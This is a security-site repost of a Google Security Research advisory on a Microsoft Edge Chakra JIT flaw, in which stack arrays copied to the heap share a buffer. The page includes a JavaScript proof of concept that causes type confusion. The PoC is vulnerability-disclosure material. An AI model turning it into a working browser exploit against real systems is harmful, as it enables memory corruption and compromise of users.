首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
来源:Google Security Research 作者:Google 发布时间:2018-01-18  
/*
If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not exist in the stack. In these cases, the stack-allocated variables are copied to the heap. This is performed by the "*::BoxStackInstance" methods.
 
Here's an example.
function inlinee() {
    return inlinee.arguments[0];
}
 
function opt() {
    let stack_arr = [];
    // allocate segment to the heap
    for (let i = 0; i < 100; i++)
        stack_arr[i] = 0;
 
    let heap_arr = inlinee(stack_arr);
    heap_arr[0] = 2;
 
    print(stack_arr[0]);
}
 
function main() {
    for (let i = 0; i < 100; i++) {
        opt();
    }
}
 
main();
 
"stack_arr" is allocated in the stack. When accessing "inlinee.arguments", the stack-allocated variable gets copied to the heap. Therefore, the copied-heap-variable "heap_arr" has the same structure with "stack_arr". The code shows that the two variables share the same buffer by printing out "2". This means, even if one of those arrays' type changes, the other array can access the same buffer with the previous type.
 
PoC:
*/
 
function inlinee() {
    return inlinee.arguments[0];
}
 
function opt(convert_to_var_array) {
    /*
    To make the in-place type conversion happen, it requires to segment.
    */
 
    let stack_arr = [];  // JavascriptNativeFloatArray
    stack_arr[10000] = 1.1;
    stack_arr[20000] = 2.2;
 
    let heap_arr = inlinee(stack_arr);
    convert_to_var_array(heap_arr);
 
    stack_arr[10000] = 2.3023e-320;
 
    return heap_arr[10000];
}
 
function main() {
    for (let i = 0; i < 10000; i++) {
        opt(new Function(''));  // Prevents to be inlined
    }
 
    print(opt(heap_arr => {
        heap_arr[10000] = {};  // ConvertToVarArray
    }));
}
 
main();
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Edge Chakra - 'AsmJS
·Microsoft Edge Chakra JIT Loop
·Microsoft Edge Chakra JIT - Ou
·Docker Sudo Privilege Escalati
·Microsoft Edge Chakra - Deferr
·GitStack 2.3.10 Remote Code Ex
·Microsoft Edge Chakra - Incorr
·Primefaces 5.x - Remote Code E
·Microsoft Edge Chakra - 'Javas
·glibc - 'getcwd()' Local Privi
·Microsoft Edge Chakra JIT - In
·Smiths Medical Medfusion 4000
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved